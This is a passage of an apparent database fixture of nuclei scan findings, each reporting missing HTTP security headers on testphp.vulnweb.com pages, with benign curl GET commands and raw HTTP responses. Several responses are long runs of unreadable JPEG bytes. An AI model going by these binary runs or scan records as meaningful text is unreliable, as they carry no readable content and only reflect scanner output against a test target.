�;X�Ct�#\u001e;�'��k����uHu\u001cn��4n�b\u000b\u0013�9�!o(H�V$�g�!�0\u0007q\u0019��}D�:��\bw�VT`Tgk\u00021�\u001f�����rj��k�'��K\u0016f\u0003h����[J�v�\u001bk�� �,b\u0011Š�&a����X\u0012�2�I��\u0002��T|>��i4����l��\n���;eܜu���|�E��ܶ$�v�\u0001$�N\u0007\u0003�O��}Ci\u001a\u0004��9�l2ZE*I?lq�羱Ks[�\u0014�Ӵvq��z��ȩǂMcc�QE\u0015ć\n�(��I4\n(�@&�E\u0015X����O��Ьo4幞6i"i\u001c�\\H\u0001L+\u000f�OX<��\n+Zڎ�B�Ⱦ�a@\u0019�x�\u001d\n\b澉%@�͂��)���\u000e�V�h�����\u0011��!=�\f\u001e?����wcmh���\r�6|1<}L\u0015G�@\n\u0007�\u0014Q^}�~fs��!�\u0005��#����يX����WyB�<��=\u001c�\u0019��j�Ԓ46dE�W�#*�\u0002D�s��~�\u001c�sE\u0015��b��7-�I�"�\u00126��A\u0006�4]��]\u001b��5�\bcx��1�ъ�\u001c�t��A�S���Ez>3�\u000b�%|���MSF���\n�I�rG��1�I�:żp��l\u0017r�\u0017\u0001��\u0002�\u0015�\u001fO\u0003��\u0001�\u0002�(�j�K�������", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 930, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/8.jpg.tn", + "discovered_date": "2024-11-13T02:42:28.812Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/8.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4139\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nEtag: "4dca64a1-102b"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0005\u0001\u0001\u0001\u0006\u0002\u0003\u0004\u0005\u0001\u0007\b��;\u0010\u0001\u0003\u0002\u0004\u0002\u0006\b\u0005\u0004\u0002\u0003\u0001\u0002\u0003\u0011\u0004\u0005\u0012!1AQ\u0006\u0013"aq�\u00142T�����$B���\u0015#3�Rb4r���\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007��(\u0011\u0002\u0001\u0003\u0003\u0004\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011!\u0004\u00141\u0005\u0012AQ\u0013\u0015"B2ab���\f\u0003\u0001\u0002\u0011\u0003\u0011?�S�K��@�\u001bU\u0010z�~\u001d*D���@e��\u0012+�oQ��Vߩ�}I�����{9%L�Oy\u0014ÃX�z�?��h�"2��0\u000f�5ޤѺ�\u000bU��Z|\f���vv�����\u0003)����i��R���Eã�o�t\u001f\u0014\nc�5�uB�\u000fq����\u001b���t�H�)�l\u0007�� N\u0015{\u001e�\u0003�U]�7\u0012`�\tM��aT��h�k�-&\u001el)=�\u0002�F\u0013k��\u0018���W6��$��S��u�\u000ey�eQ��\u0015�I9g��\u0017�0$�\u0015��56\f�m��#�����N�Oq�����Ʋh|���I/2\u001a,-���$w\u001d~uE�[ ������V�����"<�H�\f��;�\u0015R+.A��G.F\u0018K\u0003vTڞ�e\u0013��>�\u0002p\u0007`�_�:�\u0018\u0002�0A�ދ�C�\\!�\u001eJ�����\n�H�U+Z�wQkXBS�m�\u0014װ�3B�Ȏ\u0019������+J7�\t��hI���\u0016j\u0003�G΋��{C?\u0018�\u0013`6�d��3�=s��`��(�ȟ3�����\u001b'��wཥ��W\u0005�M|b��\u001fW<ظ\u0007�\t�\u0015Q�����\u001e%?J3�\u000f�����[\u000e7\f�b�օt� 3�.\u0006���趹\u001f����FYl=���R�a�\f�B���YO�\u001f���C_:i��ײ��FY,=���R�a�\f�b���YO�\u0012�\u0007�e@Gq�Յ�&G���[\u000fhg�\u0014�X{C?\u0018��\u0019t� \u00118j�\u0012�\u0011�jSa;2G�\u0013F�,=���Rɇ�C?\u0018��#��`8�ZOe$yԨ�RwfO2h�%��3��Yp�hg�\u00147�}6��\u0010\f(��\u001esK��De\u0003�Q�\u0016#k�~1K�^���(oE��~��0����OvSL\u00188V�\bO�@��{K_\u0018�E��埌Q�1�NH�\u001c��� M������\u0013���;W$�ӷ�\r�\rZ�$;m�c(\n�T\u0001�I�4��~��Ņ�׽z\u0016�\u0014 \u0001�E�$�xk\u001bl8p�ϨR�\b�\u001d-Ŵ;���L!��V\u0016�\u0002�+�\u0003��\u001f|�u��b\bk�.:�\b�LƁZ�Ѓ�X���h/���.B�eH))!! H�!;lg�0▪E�}P}�(���)#(%[\u001d���YWQ�J�.���]��b/\u0007\u0002\u001cs�@P$����M����\u0012�SM�^\u000e-A\t܉�G\u0018�\u0016��o\u001crԼ�E�u�+*���F�.���V��˶�\u001a��-#+�7\u0004J\u0013�a\u001a� ��\u0002$M\tu\u0019���;e��Yx�(�6\u001c�!\u0004�Y���\u000e����b��\fN�\u0019E�n��#�m��9���H1�\u001f��ڠ��Ɉ���[j\u0015�!�0��\u0003\u0007�&"\u000e�j)�8��Iq�f��}��\b\n'|����Y+7r�J\u0017�7�I�U~�����Gajȩ�>`x��Ķ��8��6�]:P�FE�+*Q�\u0012F�\u00065\u0010�Tq�C\u0007yƔ��\u0010��\u0011�=��\u0019'�y�v�l�p�_\fqn+�]����$q\u001eQ�?\u001aYW����\u000fd}\u001a��q7\u0015��۔��\u0004��\t\u0002\u000f\u00025\u001ae\u001cF���8�$�\u0016��\\C\u0004f��2�\b�\u001a�5\u0011���\u0002��î[�KL�խh%N\u0013�h�\u0004�\u001c\u0001o:�d[�]�Y\\��бd�W(\u0005��\u0003S�\t�\u0013��Ũ�{�\u0013�<X4��1\u000b��,ߘ\u0004���\u0012��<9H��4�X��\r�p]Y�\u0003�\u0019"7�Q�\u0015�/�ww�u,\\:۩�\b�*ˤ�7\u0018���o�����`k�\u001a]��mEJ%Dd��"gS���\u0013�=\n�he��1%J/\u0016\u000bn�Q�۾�\u001fq�<م$�j�=.�R�/�S�hO\u000e�\u0012�$��������Ze'e\r9@�֯�ݦ'���\u0012P\u0014�\u001c���se��\u0003A��jZ�����-4�Y\u001bk����r�TBGorv\u001bӏK���}I\u0003i\\��7��0���T�\u00044�k�\u001d�$��;N\u0013vm\u0014���ܘ�Gw\u0012|\u0006��������\u0005�\n�.�p�t����r�皤\u001d0�*���\u001d�SC\u0016WV�o�9�|��C���J���C"4���\u0013R�v�.��\u0019�\u001bG��VHL\u0002\u0006i�\u0006����ޒ]B\nV�\u0019i�l�β�F\u0012\u001ce���Ќ�@\u000e�>\u0014��\u0016�YԄ�ⳒN�����x�\u0016�u���\u0010BB�\u001c�T���\u001c7�4.����x�(�V\bB3��6�غ��/�\u0012îu��$�W]@�����\u0016�a͵�4\u0014\u001a�\u001ey�\n@�'��\f�\u0004F��\u000e\u001a�{���ܦ�(��Fl���*ݻ*��T\u0014����Q�*\u0007�\u0006i�"���\u0010�t���!qw��ݷ�>�\t�cI\u0011��Y�[\u00168��-\u0015t�>��P�ҳ\u0015&`(�\u001a��üP-���1��H\u001dA=��ӕ\u0016٭�p�mՙ�tR\u0002���\u000f�w���8G)\u0007�K�]N4�Wn�\u0010�\u0003,�\fs\u0007]�3"^HPK�F�H\u001a�p�oDNa]K�2��HP\b��y�}��U�,57=Z�n��1\u0019c�����U�\u0016\u0001c\n͉�\u0016���U��\b��Jں��j���\u000e��B\u000bn%3\u0005�F�{ֵ�\u001bl\bB\u0019lI��))H��\u0003a�\u001d��S\\�n\u001dYm$+)�刐 �\f\r�����u'��0��Ҝ�i!JP�,L�\u0001\u001aL��\u001fJ�|�,p�KRB^t\u0005����h;�j�Ͳ�ԧs��H�V��m�\u0001�����C8�,�!���;�bg:�\u0004�5�\u0018\u001a��.�\u001e����[�\u0002oqE�\u0013n��R\u001a �\u0002x}k�z\u0011�3��\nn��9n\u0002V�$���Q׈\u0002I܃�y& �\\�T��F�L@\u001e\u0002���^\u001e�k�u���D\u0018��+�^��\u0004�\u0019\u0013�Y�\u0015��\u001b[莩�ħi�\u000f�:���c�<\u000b�6\u0014d�*$����L��]�\tm����\u0002\u000e�R��b���)& ������q�@��]���U��2r�)L�����,=�ш\u000b�”�܅(\t��\u0015�\u0004�?:1w\u0017��ZP��%\t�`(���D��.� �q��!��Q���Y�w+��\u0012�,)X�a`6�\u0018��*x�1\u0014K�Z��\u0007�z�,��HS\u0004�)\u0006\f�G\u0001 ���\u0018��ıD���*ԭZ7��\u0015��\\=\t’�R-���\u0010]�h��]~T��e(Ő\u0005�p���\u0004\u0003�\u001a�*+2kZ�\u0015ZD\u0014\b�YB9V�p\u0002L�Ԥ��IWn��\u0016��m&@��L�37\u001a��RX)YЂ)�� \tN\u001eop�/�R��\u000eGF�DhF�6:�M2ѻ�[��\u0001SZ\u0012�Ǻ�C�Akv��Q\r�\u0018:�H��D*]�U�H\n�II\u0013\u001bH\u001e\u0015�nQn-`(����G\u0010�\u0013�v��\u000e����5a\u0017�D����u���x�\by���\u0002#��\u001bT��J�z�\u0007Q��c_�Y%L(%o\u0010hu�7\tZb\u0012�"u��H�Tn\\�ܽVT\u0015+�\n�\u0012\u000e��X�踸jє�\u001a�~�뫺ZD���c0\u0004\u001f�W�d.��Iq3m`��c9\u0019\u001bo��Y>C���-�%���d����'X'�O��[��n�ajNl��\u0001������f�:V��ʄ'a�km$�\u001e��S\u0002�y�\u0015\u0003A�_€a�.�\u0001�!#���J�I�N�����g �Guk�q`\u0010��-�/1\n'y��/4�25\u0006x�\u0014��\u0010u�\u001ba�`%:�G\u00045�3j��H8��\u0004��PU�'¶1|=~��[Z\u0003-���:�y���\u001d\u0012e-\u0002�$�� \rD�υ[�R�c\r-)!\u000f9�W08\b�|�\u0014�7VȄX&(ղ�s\u0002\b%*�\u001fޝ�\\e\u0018��Wn���O>:���&�\n\u001c$fȭ��@�\u0002� (F�)�˽Ir\u0017$�٣qg\n��\u0019�\u001b����T�\f\u001f�\u001c�6�����(��'.i�׉�����ʙ�;q��S���FRM�J�R\t�\u001b�\u001fÊ�*���0EJ���� \u000eU�\u0002�\tY�䟥[w�\n�Ӑ�P��W\t5��6�\u0001eAGI\u001a\u0011�UD)eq$�w�|�VR\u0012�\b�t"L�Ƅ��\t�ڛ��L�s\u001e4�|��\u0001\u0001�\u0001���J�2�G7*����&\u000e�\nT��<\u0012����vaCj����*p��\u001b�#�TEڒ������M\u000f=�B�'bi�)?\u00029�y-�.V���\u0004�́���]�:�\u0015��4����rgi֚�\u001f��U��:xҚ\u0007�\u0012�p�У�S�\rj�M���\u0006�x\u0011�R�O�uQ<�Y�\u0014��J�O}3�Q�懲\u0015�ҖH\u0003��L٥e!*�xD�a\t#:\t���J�\u0010��\u001c��&*�)"�(ˆ\u0014aL\u000b\u001bR��\u001a�\u0010A(<x��P�J�Uqrd�5#6�'�Z\r::��\u0010L�sN���"��w��²z�m*�4�7&\u0016gp5=��R��*A�P����h��ي�ՙ�*%i@$�`i�k!�!S\u001a�|�ҥ\\�\u000e��$\u0014�\u0002t�j\u00022�@m R�W�1f̤�����\u0017�\u0012��p��J�\bԵ(�cz������iR�PV�\f�y%m���\u001fqS%\u00031\u001e?*T�>E\u0011\u00039\u0011�>�j�\t�>�R�Q\u0001�N�\u0014�z�@ޕ*Ҹ2ˑ�\u00026\u001bTKBH:R�Q�\u001c[I))\u0012\u0007q�LI\u0001\u000f\u00109q�J���j��4���P��\\P\u0011=��Uf���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 931, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50' 'http://testphp.vulnweb.com/pictures/5.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/5.jpg.tn", + "discovered_date": "2024-11-13T02:42:29.030Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/5.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 4428\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:42:12 GMT\r\nEtag: "4dca64a1-114c"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001b\u0002\u0003\u0001\u0001\u0001\u0004\u0002\u0003\u0005\u0001\u0007\u0006��2\u0010\u0002\u0002\u0001\u0003\u0003\u0002\u0004\u0006\u0002\u0002\u0003\u0001\u0001\u0002\u0003\u0011\u0004\u0012!1AQ\u0013"\u00052aq\u0006\u0014#B����R�\u0015b�r��\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006\u0007��/\u0011\u0001\u0003\u0002\u0005\u0001\u0007\u0004\u0002\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!1A\u0013Qaq����"���\u0006�\u00142���\f\u0003\u0001\u0002\u0011\u0003\u0011?�\u001a�d�������0�V\u0015��gQ�%XmƲ ��Tg6�ru�Ʋ0��G\n>2y��d�EV\u0019m}3�1��<*������qY\u0016`��d��6�k"�w��r�{0�qY.��\u0019*>3��F\u001e\u0013u�\f�\u000f\u0018�Du2i��h.�H�2��\t\u0019^Ӗ�.z*�J��\u001d\u0014\u0002�@2ء\u0012\t\u0018=�+\u0012T\u00176.�-��EcZA\u0012,�*�!\t\u0003o\u0007�:�<��x����Fh�u�'\u000b\b6\u0001&�\u0003��\f4\r�|�Ӽ�@\u0005��>[$LL\r2Ѡ���\u0019ƈ���Ӆ�����\u0007�=N��2<t�R�*Xr�r�\u001d8?+\u000b�#2H��1�\u0012D�ሠ\u0006�6�9\u0006�o�}�\u0001`ֻV�V\f���./c�Y�p��4�z\u000fH�\u0011V\n��\u001b��u�\u0012)X\u0005�n��:��aU\u0004��\r?�?�\b�\rm^�����\r}��\nF�\u0019��I\u0004J�\u0015:�\u0003�d�?��SϬ��$!�j\u0004�6�_�_\u001fk�\r\\��UM4�(\b\u0016\u0017$����t���x$\u000e\u0019\u0003q�#ʚ�>�+\u001a9�3�;V��8��c��Lz\u0007Ӽ�6�53�\u0012�eZ8\t4\u0018���J�\u001c\u000e��4�@��M��1���\u0005EF�r9*H�(qV\u000b���,�q��������m��%� �\u0006�B�p�\u0004�1b\u0010��j9$�}?���,[M���\u0001\u001b�kQ\u001dױ�`�+l�iqf����Ww�%+\u0018���]���$�p/8󿡣�@���r�E�k\u001d�6<�\b��c\u0006�IYX���/�q��R:\u0018�5\n^%e\u001eǐ�\u0007��U}��<��&��R��)\u0012H��\r���<�9�&�W�I6�?a?9���!�uR��51>�\u000e��\u001e\u001dDl-8;ā����6\u000f?B\u001b\\n�jꧠ��q~c��i����$SH�\u00132L�@�W�*ё�f�z��+��m9���\u0014�b*��V�Z4o���V��\u001a�ٷJʭ�H�����\u000ex��\u001b�(��%�;+��U0��XKo���hi�\r4~��~`��(b»�z׎����h@`���6�eGݶ��V\b�\u0005�ʦ���6���\r�;�\u001d\t�@��s�C\u0014r�R3\u001f��2\t\u0014i���TG�:\u0010\b���B�'�(\\e�p� |�R�.�\u000b���t\u0005��\u0002C��7\u0016���"����8�\u0007M�E$,�&\u0014\u000e�<�\u0007��\u001d\t�4�JҼ�~��9jC,d�ف\u001c\u0001�;�]�\u0007kZ߇��P��\u0015�2�(k��/�\u0011�M���:�d�N�����林ԝ�CpX��8�/�\u0016<�\u001c�8������'�kkb�u\u0011G/�^O�T\u0014x�}Gׯ�Š�sJ\u0015�e\n�w�ZW�\r\u001e/�W{]{\u0005��UQ22]a}{�>]OK��F�*D&�7;��{��Q\u0010���C�P�G����v(\u0001��O8�ZWi��\u0001i#4֥A�ш��sW]��\u0013$�4N\u001fiV�n�\u0006\u001c��\u0010~��9#\u0001:\u0015F�H\u0003���\u0001��S���"��A%��x��\u000fw5���\u0003*�\u0003\u0016�IY�HY\u001byqE@��5��o�۾��\u0012(U_dP�V4-)$�J,�l�"��ךˌ\r,pƞ�s���\u00197B��-�C�m��\u000f\u0016\r��B�f�\u001b\u0014����\u001fE�ڄ����18��\u001d��UoU��"�оؤӳ0\u0006�p3cT����#�5\r$6x�\u0010z�&ʶ�Th\u001a#�V-\u0002j\u0002\u0015\u0005\t��\t\u0014M_#�\u001b�\u0005\u001e/+�óJ���F���%�K��R�F�*�2����~��hi�%d�4�Ez�\u0015BG�\u0006�5`t�\u0003�������*��I�\u000eù�9<e��@����xԊfQVv�@�]��xÂ��zI��c�\u0005u�A#*:�B\u0003Q�M\u0003G�DgSB���ޑ3����Z��\u0001�y\u0001�t錬\n�$��]\u0001\u0004�ˎ�x�\t��Y�\u0002��:d\u001a�A\u0010�f�\u001c�-�{�-tv݁���V2�.W5Y�\u0018\u000bKέ��,yt蓕�U��fP�[o�]\u0001aۥu'\u0011\u0012)��+\u0017ݹ\u001c8*\b,\b�{w\u0007���I�]\u0013Țy�\u0012eYD�C!dV\u001e�\t5�A�\u0002��\u000eT�B}k��1�2�K\u001f\u0014��.k\\30��F.ڗ\bݭ�}�j�,o�[\u0013\u001b\u001c�\u001a�<Qʂ�ov]�`�n��\u0012mH��^�古T�|r��]�\u0002O\u0015�u'�\u001c���������$�\u00166�rgK��]��\u0019����:�\n_;��}�\r�j\u0010�����sn�N�]��뷋��L�L�E\u0014Q�Wolq�v\u0002�/h#ڶ;��rT\u001b����1X�{I{@��d��d�\u000fóG�D�j�(Ν��\tm\u001f1a@��r7X\r^E�@�t�!�U�+\u001bI��GP\u0019�\nwn��\u0010\u000f\u001b�b\u000fZ 篡�ӟO<���bd(����i�n��o\u001b���q��������7z\u0016#�U���������fe^\u001a���.kYrQ�4E�5����d��\u001c\u0002NԠ�\u0010��$w��O�0$\u0012��x���L���\u0004��.�lR�c�H5���Ŭ1��Y\n�\u0006�\\\u0005\u0003�_<�n�՞2��'u�84s�B\u001a��i��J\u0002�*�GI1�a\u0011�6�T��\u000b*�\u000bW�\u001f�~���P`��P��ۻ1w��fbI�9���h��\b����\u0015QI&�\u0001G=z<��\u0015_\u0012�i\u0001/c@��ZS�H��b\u0012��\u0018�K�`R9w,G\u0002\r_S���K�ַZ��~!9�4��5Dc܇jPF\u001cݐ�l}�{4���锉��*fm�����׻h\u0015f��\u0019{z!��\u001d8W`_���\u0005�W`C��o�=M�\fG\u000fu`\u0001���\u0010\u0019%<��fk����I/�4_\u0001�/�f_�,(�HǫРM�=\u0005�?z�mY;����\t\nzu��篃]\u000em|GYꬔ�B�%MY՟�\u0017]<�kkUQ\u0015���V76�D�������\f�������/�p�M\u0010!����o��J�[�;\u001b\u0004_RB�#\u0005��@�� �=8$_�p�Y\nV�2\u0016�%��\u0007��yѨgӘ\r\u0018�=7W��\u001f�\u0016�|\u001b=1��b�+�<�� <O�j�\u0003V玎�+~�Q����x���\u001d��?\u0010O,_��'��C\u001bN�b�<�n\n\u0018��n��\u0018�\u0015d_��N\u0011��;�\fȼ���͑��{4�tq�:HF�I57"�\f�\u0013a�F��������B��'$���\u0019cy^��8���\u001e6�^E�\u000e_����ru��La��\u0019�6�\r\u0005t$\u0017b�\u0016�kn9�U���?�U�m�\u0015��O5|�z#��;.��Ԛ�i*���v�b\u0005� ]mcԟq��\f�l��\t%E�\u001c�'?��O\u0007�'��)�њ8�\u000b�u\u0006�Y���nQ�ߥ�9��\u0002\r\n��W\u0015�����i�u�qFY�)U�n��\u0002��ӽ\u000b$�,~f#(t��87���G>*�}z��/{�@5S��z\u0016�\n�!f�H�\u0019\u0002m\f�6��n�\u001b`\u0005�NVȻ\u0013�9\u0004��]����7W�,�,��_zG\fP@�!�\u0004h��\n\u0005\u0001}�;�p�,��d��Z�O\u0003�j<�t�\b�A2\u001a�\u0013|u�+��*�S�Ԑ\u0011�3���������h��?A�V2\t�,�\u0015��*���A�Zy����d'k*�-�M����n�\u0007��\u0016E�S\u0011C\u000b�%���_�}�50j\u0016#�i�ƀ���W�U��j�y�1\u000b\u0006��\u0013��$��2Q�uA��P��I�2i=�\u001b��\rq�h�P+�\t��$��\r$���x�`��\u0001\u0007�\u0004U����p\u0004E�Ԅt8�Dl!����\u000e��\u0016���%�j&�\u001eÓҸ\u001c�\u0005��uh�eT\by��ہ\u0016v��]��;���k�^��/#6�����l�\b\u0015`\u0002�x\u0007�8�{<�\u0007\u0006�\u0015���ZD�\u0002Á�Z�Yv�3X�x�]�\u000b9:v����\u001c\u001fo��*�t������l'���\u0015d�)�XC����A?�[�;\u001e0̆�\u0006���{$�:\u0011~E�\u001eˌE_�:�cd�6����@\t x\u001f�ZX�0���r\b�\u000b&�X5q��W��\u00114!Ķ(\u000b�P�\u0015�!`�\fQP��\u0016]���S@(n�\u0015<�?sB�h����=\u001e,�&�63��׿mO�ȅ\t I�C\u001c��\u0010�ɽ�ŀ꠆�u\u0004\u001a�#��|�`j��T�\u0014h�1=�\u0004W ݃�&󷦱�fU\u0014\u000b��#�O'��F�>y�\u0013�1���|�&U\u0004�`,{�\n8�g�$���N�!sjň\u00062�]\u001b����Uu�s����s�`t%�T�\u001bzr���\u001bd$h�����&�鿱Q��Z2��J�E3�.��#���\njd3\u0015�L��R�E��d�\u001cw<p:_$N҅�Nc\u0006��\nO���T�5\b�G#iF�\u0011?.����@������Y�y\u001c�̞h*gf\u0014�3-�N��#B;��z���b\u00074t�E�P�ʦ3 ��v��H\u0004\u000b�\u0016y=,���\u0014�"x�\u0002�����J�\u0005J�<�$�\u0004U^Dح�כ\u001dc�c\u001aK��K_���9^\u0018�W�aZ�]��Զ’\u0002�T�\u0006(y��\u000f���9c\u001c<�\u0014���,�t��Y��_o\u0019\u0016������7��b�T��cma��q�Y�^\u0017��N#V+�q�.�C"���L\b�M��:\u0002~�k�|�}�xA�*���8����Y\u00022�*�\u0004\n6��\u0001�\u0003���\u000e+�I\u001e�T\u0004\u0006�*�t�/8Xb��\f�akr��V4��$���Cvp��.W�\b\u001a�\r��5F\u0016�7F�o[�\u001d�#��w}1��n\u0010MHٛ���k��L�,Z��\u0005\u0014Esȫ\u0007�:x�k�U��h�~ߘ���^*��\u0019��8X���|x4L:�Ga����]Z�\u001b,jC9�!�\u001e\b����ŞVaL���Qg9~p\f��+���\u0019�\u001a��l�p�\u0018�Q�\f1'F\u0018a�$g\u0018�\u0018c\u0014�u\u001d��o�\u0018bR���\u0018`�F\u0018a�$a�\u0018�Fr�\u0018bF�a�\u0018(���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 932, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59' 'http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/wvstests/pmwiki_2_1_19", + "discovered_date": "2024-11-13T02:42:29.265Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /wvstests/pmwiki_2_1_19 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Edg/91.0.864.59\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:42:25 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /wvstests/pmwiki_2_1_19/</title></head>\r\n<body>\r\n<h1>Index of /wvstests/pmwiki_2_1_19/</h1><hr><pre><a href="../">../</a>\r\n<a href="scripts/">scripts/</a> 08-Apr-2013 08:44 -\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 933, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko/20100101 Firefox/24.0' 'http://testphp.vulnweb.com/pictures/6.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/6.jpg.tn", + "discovered_date": "2024-11-13T02:42:29.476Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/6.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; 